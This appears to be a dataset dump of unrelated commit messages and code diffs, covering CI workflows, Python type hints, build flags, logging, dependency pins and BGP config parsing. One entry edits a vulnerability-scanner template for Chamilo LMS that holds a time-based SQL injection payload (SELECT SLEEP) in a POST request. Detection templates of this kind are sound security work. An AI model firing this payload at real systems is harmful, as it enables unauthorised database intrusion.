+ changed-files: ${{ needs.get-changed-files.outputs.changed-files }}
+
+ macos-12:
+ name: MacOS 12
+ needs:
+ - get-changed-files
+ uses: ./.github/workflows/test-action-macos.yml
+ with:
+ distro-slug: macos-12
+ nox-session: ci-test
+ changed-files: ${{ needs.get-changed-files.outputs.changed-files }}
+
almalinux-8:
name: Alma Linux 8
needs:
@@ -269,46 +309,6 @@ jobs:
nox-session: ci-test
changed-files: ${{ needs.get-changed-files.outputs.changed-files }}
- windows-2016:
- name: Windows 2016
- needs:
- - get-changed-files
- uses: ./.github/workflows/test-action.yml
- with:
- distro-slug: windows-2016
- nox-session: ci-test
- changed-files: ${{ needs.get-changed-files.outputs.changed-files }}
-
- windows-2019:
- name: Windows 2019
- needs:
- - get-changed-files
- uses: ./.github/workflows/test-action.yml
- with:
- distro-slug: windows-2019
- nox-session: ci-test
- changed-files: ${{ needs.get-changed-files.outputs.changed-files }}
-
- windows-2022:
- name: Windows 2022
- needs:
- - get-changed-files
- uses: ./.github/workflows/test-action.yml
- with:
- distro-slug: windows-2022
- nox-session: ci-test
- changed-files: ${{ needs.get-changed-files.outputs.changed-files }}
-
- macos-12:
- name: MacOS 12
- needs:
- - get-changed-files
- uses: ./.github/workflows/test-action-macos.yml
- with:
- distro-slug: macos-12
- nox-session: ci-test
- changed-files: ${{ needs.get-changed-files.outputs.changed-files }}
-
set-pipeline-exit-status:
# This step is just so we can make github require this step, to pass checks
|
Update _client.py
Update the type annotation for the default_encoding parameter of AsyncClient's initializer to accept a callable of the form (bytes) -> str. | @@ -1363,7 +1363,7 @@ class AsyncClient(BaseClient):
transport: typing.Optional[AsyncBaseTransport] = None,
app: typing.Optional[typing.Callable] = None,
trust_env: bool = True,
- default_encoding: str = "utf-8",
+ default_encoding: typing.Union[str, typing.Callable[[bytes], str]] = "utf-8",
):
super().__init__(
auth=auth,
|
CentOS6: Fixup using ancient gcc with Nuitka not knowing the option.
* The 4.8 is where I found the option, it may be older, but we don't
care, eventually these old gcc will become unsupported. | @@ -816,7 +816,7 @@ if gcc_mode:
env.Append(CCFLAGS=["-fwrapv"])
# Save some memory for gcc by not tracing macro code locations at all.
- if not debug_mode and not clang_mode:
+ if gcc_version >= "5" and not debug_mode and not clang_mode:
env.Append(CCFLAGS=["-ftrack-macro-expansion=0"])
# Support for clang.
|
Log instead of echo
Write command output to log instead of directly to console | @@ -36,11 +36,11 @@ def report(context, case_id, report_path):
customer, family = case_id.split('-', 1)
existing_case = adapter.case(customer, family)
if existing_case is None:
- click.echo("ERROR: no case found!")
+ LOG.warning("no case found")
context.abort()
existing_case.delivery_report = report_path
existing_case.save()
- click.echo("saved report to case!")
+ LOG.info("saved report to case!")
load.add_command(case_command)
|
fix: Skip review logs
while adding to enegy point logs to docinfo | @@ -140,7 +140,8 @@ def get_comments(doctype, name):
def get_point_logs(doctype, docname):
return frappe.db.get_all('Energy Point Log', filters={
'reference_doctype': doctype,
- 'reference_name': docname
+ 'reference_name': docname,
+ 'type': ['!=', 'Review']
}, fields=['*'])
def _get_communications(doctype, name, start=0, limit=20):
|
Chamilo 1.11.14 LMS sql injection
YAML file is now indented correctly | id: chamilo-lms-sqli
+
info:
author: undefl0w
name: Chamilo LMS SQL Injection
@@ -13,8 +14,7 @@ requests:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- type=image&field_id=image&tag=image&from=image&search=image&options=["test'); SELECT SLEEP(2.5); -- "]
-
+ type=image&field_id=image&tag=image&from=image&search=image&options=["test'); SELECT SLEEP(1.5); -- "]
matchers:
- type: dsl
|
Avoid KeyError: 'multiprocessing'
Fix for | @@ -81,7 +81,7 @@ def _read_proc_file(path, opts):
except IOError:
pass
return None
- if opts['multiprocessing']:
+ if opts.get('multiprocessing'):
if data.get('pid') == pid:
return None
else:
|
pinspect profile: fix display of USE flags and masks
Intersecting overrides shouldn't be shown as either negations or
enables as they cancel each other out.
Also fixes showing all masks for a given profile. Previously some could
be skipped during enumeration causing them to be missing from the output
as well. | @@ -217,27 +217,34 @@ class accept_keywords(_base, metaclass=_register_command):
class _use(_base):
+ def _output_use(self, neg, pos):
+ neg = ('-' + x for x in neg)
+ return ' '.join(sorted(chain(neg, pos)))
+
def __call__(self, namespace, out, err):
global_use = []
- pkg_use = []
+ pkg_use = {}
for k, v in namespace.use.render_to_dict().items():
if isinstance(k, str):
- pkg, neg, pos = v[-1]
- if not isinstance(pkg, atom.atom):
- continue
- neg = ('-' + x for x in neg)
- pkg_use.append((pkg, ' '.join(sorted(chain(neg, pos)))))
+ for pkg, neg, pos in v:
+ if isinstance(pkg, atom.atom):
+ pkg_neg, pkg_pos = pkg_use.setdefault(pkg, (set(), set()))
+ pkg_neg.update(neg)
+ pkg_pos.update(pos)
+ matched = pkg_neg.intersection(pkg_pos)
+ pkg_pos.difference_update(matched)
+ pkg_neg.difference_update(matched)
else:
_, neg, pos = v[0]
- neg = ('-' + x for x in neg)
- global_use = ' '.join(sorted(chain(neg, pos)))
+ global_use = (neg, pos)
if global_use:
- out.write(f'*/*: {global_use}')
+ out.write(f'*/*: {self._output_use(*global_use)}')
if pkg_use:
- for pkg, use in sorted(pkg_use):
- out.write(f'{pkg}: {use}')
+ for pkg, (neg, pos) in sorted(pkg_use.items()):
+ if neg or pos:
+ out.write(f'{pkg}: {self._output_use(neg, pos)}')
class use(_use, metaclass=_register_command):
|
View Asset Dashboard -> View Asset
Summary: Minor thing, but we don't use the phrase "Asset Dashboard" elsewhere in the system.
Test Plan: none
Reviewers: alangenfeld, prha | @@ -283,7 +283,7 @@ const MaterializationContent: React.FC<{
<MetadataEntryLink
to={`/instance/assets/${materialization.assetKey.path.map(encodeURIComponent).join('/')}`}
>
- View Asset Dashboard
+ View Asset
</MetadataEntryLink>
]
</span>
|
Update fill_segments.py
color palette saved=false | @@ -51,7 +51,7 @@ def fill_segments(mask, objects, stem_objects=None):
value=counts[1:].tolist(),
label=(ids[1:]-1).tolist())
- rgb_vals = color_palette(num=len(labels), saved=True)
+ rgb_vals = color_palette(num=len(labels), saved=False)
filled_img = np.zeros((h,w,3), dtype=np.uint8)
for l in labels:
for ch in range(3):
|
Increased resolution in HDF5 data
Increase the resolution of the data saved in the HDF5 files | @@ -722,7 +722,7 @@ class MeasurementControl(Instrument):
'Data', (0, len(self.sweep_functions) +
len(self.detector_function.value_names)),
maxshape=(None, len(self.sweep_functions) +
- len(self.detector_function.value_names)))
+ len(self.detector_function.value_names)), dtype='float64')
self.get_column_names()
self.dset.attrs['column_names'] = h5d.encode_to_utf8(self.column_names)
# Added to tell analysis how to extract the data
|
Python3.4: Some versions in the wild appear to still do it.
* We don't care that much, probably some backported patches,
nothing in the upstream source indicates this. | @@ -239,7 +239,8 @@ class ClassIteratorRejectingThrow:
return next(self.my_iter)
def throw(self, *args):
- assert len(args) == 1
+ # Some Python3.4 versions do normalize exceptions.
+ assert len(args) == 1 or sys.version_info < (3,5)
__next__ = next
|
cache site-packages of virtualenv
This will include the PyTorch installation that would otherwise take about 30 minutes
for compilation. Caching this reduces the build time to less than 3 minutes.
Closes | language: python
python:
- "3.5"
-cache: pip
+cache:
+ directories:
+ - $HOME/virtualenv/python3.5/lib/python3.5/site-packages
before_install:
- sudo apt-get install -y libmpich-dev
- travis_wait 32 ./install-torch.sh
|
fix missleading admin path example
see | @@ -18,7 +18,7 @@ Please check the following list.
## I want to add annotators annotators/annotation approvers
-1. Login to [Django Admin](https://djangobook.com/django-admin-site/) (URL: `/admin`).
+1. Login to [Django Admin](https://djangobook.com/django-admin-site/) (URL: `/admin/`).
2. Add a user to `Users` table (`Add` link).
3. **Logout from Django Admin site.** [You'll face login error without logout of Django Admin site](https://github.com/doccano/doccano/issues/723).
4. Add the user to the project in the member page (`/projects/{project_id}/members`).
|
Irfraction
* Added fraction support to AST.toIR
fraction is an unusual style and takes a lambda
* bug fix | @@ -920,6 +920,24 @@ case class ApplyMethod(posn: Position, lhs: AST, method: String, args: Array[AST
rx <- lhs.toAggIR(agg.get, x => ir.SeqOp(x, ir.I32(0), aggSig))
} yield
ir.ApplyAggOp(rx, FastIndexedSeq(), initOpArgs, aggSig): IR
+ case (t: TAggregable, "fraction", IndexedSeq(Lambda(_, name, body))) =>
+ for {
+ op <- fromOption(
+ this,
+ s"no AggOp for method $method",
+ AggOp.fromString.lift(method))
+ bodyx <- body.toIR()
+ aggSig = AggSignature(op,
+ bodyx.typ,
+ FastIndexedSeq(),
+ None)
+ ca <- fromOption(
+ this,
+ "no CodeAggregator",
+ AggOp.getOption(aggSig))
+ rx <- lhs.toAggIR(agg.get, x => ir.SeqOp(ir.Let(name, x, bodyx), ir.I32(0), aggSig))
+ } yield
+ ir.ApplyAggOp(rx, FastIndexedSeq(), None, aggSig): IR
case (t: TAggregable, _, _) =>
for {
op <- fromOption(
|
BUG: fixed default export_nan
Changed export_nan default to None because an
empty list default will store old values in memory
despite new initialization. | @@ -32,10 +32,11 @@ class Meta(object):
'plot': ('plot', str), 'axis': ('axis', str),
'scale': ('scale', str), 'min_val': ('value_min', float),
'max_val': ('value_max', float), 'fill_val': ('fill', float)})
- export_nan : list
- List of labels that should be exported even if their value is nan. By
- default, metadata with a value of nan will be exluded from export.
- (default=[])
+ export_nan : list or NoneType
+ List of labels that should be exported even if their value is nan or
+ None for an empty list. When used, metadata with a value of nan will
+ be exluded from export. Will always allow nan export for labels of
+ the float type (default=None)
Attributes
----------
@@ -148,14 +149,14 @@ class Meta(object):
'scale': ('scale', str),
'min_val': ('value_min', float),
'max_val': ('value_max', float),
- 'fill_val': ('fill', float)}, export_nan=[]):
+ 'fill_val': ('fill', float)}, export_nan=None):
# Set mutability of Meta attributes. This flag must be set before
# anything else, or `__setattr__` breaks.
self.mutable = True
# Set the NaN export list
- self._export_nan = export_nan
+ self._export_nan = [] if export_nan is None else export_nan
for lvals in labels.values():
if lvals[0] not in self._export_nan and lvals[1] == float:
self._export_nan.append(lvals[0])
@@ -924,26 +925,26 @@ class Meta(object):
# Return the updated Meta class object
return other_updated
- def accept_default_labels(self, other):
+ def accept_default_labels(self, other_meta):
"""Applies labels for default meta labels from other onto self.
Parameters
----------
- other : Meta
+ other_meta : Meta
Meta object to take default labels from
"""
- # update labels in metadata
- for key in other.labels.label_type:
- new_name = getattr(other.labels, key)
+ # Update labels in metadata
+ for key in other_meta.labels.label_type:
+ new_name = getattr(other_meta.labels, key)
old_name = getattr(self.labels, key)
if old_name != new_name:
self._label_setter(new_name, old_name,
- other.labels.label_type[key],
+ other_meta.labels.label_type[key],
use_names_default=True)
- self.labels = other.labels
+ self.labels = other_meta.labels
return
|
Use Spark 2.4.4 in Travis CI
Spark 2.4.4 is released and Apache mirror only contains latest versions.
See, for instance: | @@ -21,7 +21,7 @@ matrix:
env:
- PATH=$(echo "$PATH" | sed -e 's/:\/usr\/local\/lib\/jvm\/openjdk11\/bin//')
- JAVA_HOME=/usr/lib/jvm/java-1.8.0-openjdk-amd64
- - SPARK_VERSION=2.4.3
+ - SPARK_VERSION=2.4.4
- PANDAS_VERSION=0.24.2
- PYARROW_VERSION=0.10.0
- KOALAS_USAGE_LOGGER='databricks.koalas.usage_logging.usage_logger'
@@ -35,7 +35,7 @@ matrix:
env:
- PATH=$(echo "$PATH" | sed -e 's/:\/usr\/local\/lib\/jvm\/openjdk11\/bin//')
- JAVA_HOME=/usr/lib/jvm/java-1.8.0-openjdk-amd64
- - SPARK_VERSION=2.4.3
+ - SPARK_VERSION=2.4.4
- PANDAS_VERSION=0.25.0
- PYARROW_VERSION=0.13.0
|
Restored cache clearing on save
Lost this in | @@ -5740,6 +5740,10 @@ class SQLGlobalAppConfig(models.Model):
})
return model
+ def save(self):
+ LatestAppInfo(self.app_id, self.domain).clear_caches()
+ super().save()
+
class GlobalAppConfig(Document):
pass
|
dvc: fix tqdm dep
tqdm==4.35.0 was throwing KeyError: 'percentage'. | @@ -73,7 +73,7 @@ install_requires = [
"funcy>=1.12",
"pathspec>=0.6.0",
"shortuuid>=0.5.0",
- "tqdm>=4.35.0,<5",
+ "tqdm>=4.36.1,<5",
"packaging>=19.0",
"win-unicode-console>=0.5; sys_platform == 'win32'",
]
|
Enable intersphinx_mapping to PyTorch and domain libraries
This will turn `:py:func:` directives to links to the corresponding API reference. | @@ -66,10 +66,17 @@ rst_epilog ="""
# ones.
extensions = [
'sphinxcontrib.katex',
+ 'sphinx.ext.intersphinx',
'sphinx_copybutton',
'sphinx_gallery.gen_gallery',
]
+intersphinx_mapping = {
+ "torch": ("https://pytorch.org/docs/stable/", None),
+ "torchaudio": ("https://pytorch.org/audio/stable/", None),
+ "torchtext": ("https://pytorch.org/text/stable/", None),
+ "torchvision": ("https://pytorch.org/vision/stable/", None),
+}
# -- Sphinx-gallery configuration --------------------------------------------
|
fix EOS get_bgp_config mismatch between neighbors and peer-group
The peer-group syntax is deprecated since EOS 4.23.0
and replaced by 'peer group'.
OLD: neighbor 192.168.172.36 peer-group 4-public-anycast-peers
NEW: neighbor 192.168.172.36 peer group 4-public-anycast-peers | @@ -1006,6 +1006,10 @@ class EOSDriver(NetworkDriver):
bgp_neighbors[peer_address] = default_neighbor_dict(local_as)
if options[0] == "peer-group":
bgp_neighbors[peer_address]["__group"] = options[1]
+ # EOS > 4.23.0 only supports the new syntax
+ # https://www.arista.com/en/support/advisories-notices/fieldnotices/7097-field-notice-39
+ elif options[0] == "peer" and options[1] == "group":
+ bgp_neighbors[peer_address]["__group"] = options[2]
# in the config, neighbor details are lister after
# the group is specified for the neighbor:
|
Remove tripleo_transfer cleanup.yml reference
With the changes in
this cleanup task file no longer exists. The cleanup
is done within the role automatically via a block/rescue.
Related-Bug:
Related-Bug: rhbz#1904681
Related-Bug: rhbz#1916162
Needed-By: | @@ -338,10 +338,6 @@ outputs:
include_role:
name: tripleo_persist
tasks_from: cleanup.yml
- - name: cleanup tripleo_transfer
- include_role:
- name: tripleo_transfer
- tasks_from: cleanup.yml
update_tasks:
- name: Enforce RHOSP rules regarding subscription.
include_role:
|
Fixed country code and name lookup in Lesson 7 notebook
The country code and name lookup needed to be fixed to match the geojson file. | "metadata": {},
"outputs": [],
"source": [
- "json_layer = GeoJSON(data=json_data, name='Counties', hover_style={'fillColor': 'red' , 'fillOpacity': 0.5})\n",
+ "json_layer = GeoJSON(data=json_data, name='Countries', hover_style={'fillColor': 'red' , 'fillOpacity': 0.5})\n",
"Map.add_layer(json_layer)"
]
},
" html1.value = '''\n",
" <h4>Country code: <b>{}</b></h4>\n",
" Country name: {}\n",
- " '''.format(feature['id'], feature['properties']['name'])\n",
+ " '''.format(feature['properties']['ISO_A2'], feature['properties']['NAME'])\n",
"\n",
"json_layer.on_hover(update_html)"
]
|
Improve message when custom component fails
Improve message when custom component fails during execution. | @@ -55,4 +55,9 @@ phases:
commands:
- |
set -v
- {{ build.TempScript.outputs.stdout }} || (echo 'Script execution failure.' && exit {{ build.Fail.outputs.stdout }})
\ No newline at end of file
+ if {{ build.TempScript.outputs.stdout }} ; then
+ echo 'Script executed successfully'
+ else
+ echo 'ERROR - Script execution failure. Exit code != 0'
+ exit {{ build.Fail.outputs.stdout }}
+ fi
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.